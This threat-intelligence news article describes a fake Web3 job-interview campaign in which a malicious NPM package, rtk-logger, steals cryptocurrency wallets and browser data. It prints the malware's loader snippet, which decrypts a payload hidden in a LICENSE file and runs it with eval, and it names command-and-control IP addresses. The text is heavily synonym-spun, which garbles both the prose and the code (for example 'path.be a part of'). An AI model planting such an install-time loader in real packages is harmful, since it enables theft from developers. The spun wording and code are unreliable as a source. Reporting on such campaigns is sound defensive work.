A complicated cybercriminal operation disguised as a Ukrainian Web3 growth group has been focusing on job seekers by means of weaponized NPM packages, safety researchers warn.
The assault leverages faux interview processes to trick unsuspecting candidates into downloading and executing malicious code that steals cryptocurrency wallets, browser knowledge, and delicate private info.
The marketing campaign facilities round a seemingly reputable GitHub repository known as “EvaCodes-Neighborhood/UltraX,” which attackers current to potential workers throughout first-round interviews.
Victims are instructed to clone and run the repository domestically as a part of a technical evaluation. Nonetheless, the venture accommodates a malicious NPM dependency designed to reap delicate knowledge from the goal’s system.
On August 9, 2025, a group member approached SlowMist researchers after turning into suspicious of the repository’s contents throughout an interview course of.
The safety group’s subsequent evaluation revealed the presence of a backdoor embedded throughout the venture’s dependencies, confirming the malicious nature of what seemed to be a typical Web3 growth repository.
SlowMist analysts recognized that the assault initially used the NPM bundle “[email protected],” which was later changed with “[email protected]” after the unique bundle was eliminated by NPM’s safety group.
The newer bundle, revealed on August 8, 2025, accommodates closely obfuscated code designed to evade detection whereas sustaining the identical malicious performance.
The menace extends past particular person victims, because the researchers found that two further GitHub accounts had forked the malicious repository, suggesting a broader marketing campaign focusing on a number of potential victims throughout the Web3 job market.
An infection Mechanism and Code Execution
The malware’s an infection vector depends on social engineering fairly than technical exploitation, making it significantly harmful for job seekers within the aggressive Web3 house.
As soon as the sufferer clones the repository and executes “npm set up,” the malicious rtk-logger bundle mechanically triggers its payload by means of a classy multi-stage course of.
malicious code location (Supply – Medium)
The bundle’s core malicious code resides in “/rtk-logger/lib/utils/smtp-connection/index.js,” which makes use of AES-256-CBC decryption to unlock obfuscated payloads saved within the LICENSE file.
The decryption course of employs hardcoded keys and initialization vectors, permitting the malware to execute with out further community communication throughout preliminary deployment.
const fs = require(‘fs’);
const path = require(‘path’);
const parseLib = require(‘./parse’)
const filePath = path.be a part of(__dirname, ‘LICENSE’);
fs.readFile(filePath, ‘utf8’, (_, knowledge) => {
strive {
eval(parseLib(knowledge))
} catch (err) {
console.error(‘Error throughout parsing/eval:’, err);
}
})
After profitable decryption, the malware establishes connections to command-and-control servers at 144.172.112.106 and 172.86.64.67, enabling distant entry and knowledge exfiltration capabilities whereas sustaining persistence by means of varied system-level modifications.
Enhance your SOC and assist your group defend your enterprise with free top-notch menace intelligence: Request TI Lookup Premium Trial.
